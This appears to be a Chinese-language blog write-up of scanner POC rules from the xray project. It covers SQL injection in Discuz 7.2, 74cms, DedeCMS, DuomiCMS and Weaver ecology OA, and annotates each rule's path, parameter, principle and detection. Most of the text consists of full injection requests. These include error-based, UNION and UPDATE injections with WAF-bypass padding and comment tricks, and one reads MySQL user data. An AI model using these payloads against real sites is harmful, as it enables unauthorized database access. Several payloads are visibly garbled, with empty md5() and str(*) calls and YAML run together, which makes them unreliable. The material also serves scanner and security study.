0x00 POC 配置来源
github.com/chaitin/xray/tree/master/pocs
0x01 discuz-v72-sqli (2014)
-
配置整理:
rules: //由规则(Rule)组成的列表
- method:
GET
path: >- #请求的完整 Path,包括 querystring 等 /faq.php ?action=grouppermission &gids[99]=' &gids[100][0]=) and ( select 1 from ( select count(*), concat( ( select concat(user,0x3a,md5(1234),0x3a) from mysql.user limit 0,1 # user1:81dc9bdb52d04dc20036dbd8313ed055: ), floor(rand(0)*2) )x from information_schema.tables group by x )a )# follow_redirects: false expression: > #判断该条 Rule 的结果,使用CEL表达式(https://github.com/google/cel-spec(这不是Google的官方产品)) response.status == 200 #返回包status等于200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") #且body中包含内容(字节流(bytes),因为 body 是一个 bytes 类型的变量)“81dc9bdb52d04dc20036dbd8313ed055” && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")detail: //需要返回给 xray 引擎的内容,如果无需返回内容,可以忽略
author: leezp
Affected Version: “discuz <=v7.2”
vuln_url: “/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20”
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606 - method:
- 路径:
/faq.php - 参数:
gids[99]、gids[100][0] -
原理:floor 报错注入(利用
rand和order by或group by的冲突)mysql> select count(*), floor(rand(0)*2) x from information_schema.tables group by x; ERROR 1022 (23000): Can't write; duplicate key in table '/tmp/#sql3180_3fc4_4'具体原理整了半天没整明白,只测试发现命令中
count、floor、rand、group by缺一不可,否则不报错
新版 MySQL 好像注不出数据了,我的 8.0.22 测试 payload 报错:mysql> select 1 from (select count(*), concat((select concat(user, 0x3a, md5(1234), 0x3a) from mysql.user limit 0,1), floor(rand(0)*2))x from information_schema.tables group by x)a; ERROR 1022 (23000): Can't write; duplicate key in table '/tmp/#sql3180_3fc4_3' - 检测:
md5(1234)的结果、报错信息Discuz! info</b>: MySQL Query Error - 参考:github.com/chaitin/xray/blob/master/pocs/discuz-v72-sqli.yml
0x02 74cms-sqli-2 (2014)
-
配置整理:
set: //自定义变量,比如是随机数、反连平台等
rand: randomInt(200000000, 210000000) //在(200000000,210000000)内随机取一个整数 rand
rules:
- method:
GET
path: /plus/ajax_officebuilding.php ?act=key &key=錦' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(),5,6,7,8,9# expression: | response.body.bcontains(bytes(md5(string(rand))))detail:
author: rexus
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606 - method:
- 路径:
/plus/ajax_officebuilding.php - 参数:
key - 原理:联合查询
- 检测:
md5运算结果 - 参考:github.com/chaitin/xray/blob/master/pocs/74cms-sqli-2.yml
0x03 74cms-sqli
-
配置整理:
rules:
- method:
GET
path: /index.php ?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match &company_id[1][0]=aaaaaaa") and extractvalue( 1, concat(0x7e,md5(99999999)) # 0x7E6566373735393838393433383235643238373165316366613735343733656330 ) -- a # ERROR 1105 (HY000): XPATH syntax error: '~ef775988943825d2871e1cfa75473ec' expression: | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")detail:
author: jinqi links:
- https://www.t00ls.net/articles-54436.html - method:
- 路径:
/index.php - 参数:
company_id - 原理:extractvalue报错注入
- 检测:
md5运算结果 - 参考:github.com/chaitin/xray/blob/master/pocs/74cms-sqli.yml
0x04 dedecms-guestbook-sqli
-
配置整理:
set:
r: randomInt(800000000, 1000000000)
rules:
-
method:
GET
path: /plus/guestbook.php
follow_redirects: true
expression: |
response.status == 200
search: action=admin&id=(? P<articleid>\d{1,20}) #从返回包中提取信息,正则表达式 -
method:
GETpath: /plus/guestbook.php ?action=admin&job=editok&id= &msg=', msg=@`'`, # @`'` --- 0x msg=(selecT md5()), email='follow_redirects: true
expression: |
response.status == 200 -
method:
GET
path: /plus/guestbook.php
follow_redirects: trueexpression: | response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: “5.7”
links:
- https://blog.csdn.net/god_7z1/article/details/8180454 -
- 路径:
/plus/guestbook.php - 参数:
msg - 原理:
UPDATE注入,大小写bypass
dedecms5.7的edit.inc.php中,拼接了update语句UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id'把
',msg=@’,msg=(selecT md5()),email='赋给msg后变成UPDATE `#@__guestbook` SET `msg`='', msg=@`'`, msg=(selecT md5()), email='', `posttime`='".time()."' WHERE id='$id' - 检测:
md5运算结果 - 参考:github.com/chaitin/xray/blob/master/pocs/drupal-cve-2014-3704-sqli.yml
0x05 dedecms-membergroup-sqli
-
配置整理:
set:
r: randomInt(800000000, 1000000000)
rules:
- method:
GETpath: >- /member/ajax_membergroup.php ?action=post &membergroup=@`'` /*!50000Union+*/+/*!50000select+*/+md5()+--+@`'` follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: “5.6,5.7”
links:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html - method:
- 路径:
/member/ajax_membergroup.php - 参数:
membergroup - 原理:联合查询,
/*!、加号绕WAF - 检测:
md5运算结果 - 参考:github.com/chaitin/xray/blob/master/pocs/drupal-cve-2014-3704-sqli.yml
0x06 duomicms-sqli
-
配置整理:
rules:
- method:
GETpath: >- /duomiphp/ajax.php ?action=addfav&id=1 &uid=1 and extractvalue(1,concat_ws(1,1,md5(2000000005))) # ERROR 1105 (HY000): XPATH syntax error: 'fc9bdfb86bae5c322bae5acd78760935' follow_redirects: false expression: | response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
detail:
author: hanxiansheng26(https://github.com/hanxiansheng26)
Affected Version: “duomicms<3.0” - method:
- 路径:
/duomiphp/ajax.php - 参数:
uid - 原理:报错注入
- 检测:
md5运算结果 - 参考:github.com/chaitin/xray/blob/master/pocs/duomicms-sqli.yml
0x07 ecology-syncuserinfo-sqli
-
配置整理:
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)rules:
- method:
GETpath: >- /mobile/plugin/SyncUserInfo.jsp ?userIdentifiers=-1) union(select(3),null,null,null,null,null,str(*),null follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
- method:
- 路径:
/mobile/plugin/SyncUserInfo.jsp - 参数:
userIdentifiers - 原理:联合查询,括号绕空格过滤
- 检测:语句运算结果
- 参考:github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml
0x08 ecology-validate-sqli
-
配置整理:
set:
r1: randomInt(8000, 9999)
r2: randomInt(800, 1000)rules:
- method:
POSTpath: /cpt/manage/validate.jsp?sourcestring=validateNum body: >- sourcestring=validateNum &capitalid=11 %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d # %0a-LF-换行 %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d # %0d-CR-回车 %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d # 360个%0a%0d union+select+str(*)&capitalnum=-10 follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fuping
links:
- https://news.ssssafe.com/archives/3325
- https://www.weaver.com.cn/cs/securityDownload.asp - method:
- 路径:
/cpt/manage/validate.jsp - 参数:
capitalid - 原理:联合查询,加号、post大body绕waf
- 检测:语句运算结果
- 参考:github.com/chaitin/xray/blob/master/pocs/ecology-validate-sqli.yml
0x09 ecology-workflowcentertreedata-sqli
-
配置整理:
set:
r1: randomInt(4000, 9999)
r2: randomInt(800, 1000)rules:
- method:
POSTpath: /mobile/browser/WorkflowCenterTreeData.jsp headers: Content-Type: application/x-www-form-urlencoded body: >- node=wftype_1132232323231&scope=23332323 &formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d %0a%0d%0a%0d%0a))) # 360个%0a%0d union+select+1024,(*)+order+by+(((1 follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
links:
- https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html
- https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w - method:
- 路径:
/mobile/browser/WorkflowCenterTreeData.jsp - 参数:
formids - 原理:联合查询,post大body绕waf
- 检测:语句运算结果
- 参考:github.com/chaitin/xray/blob/master/pocs/ecology-workflowcentertreedata-sqli.yml
//未完待Xu
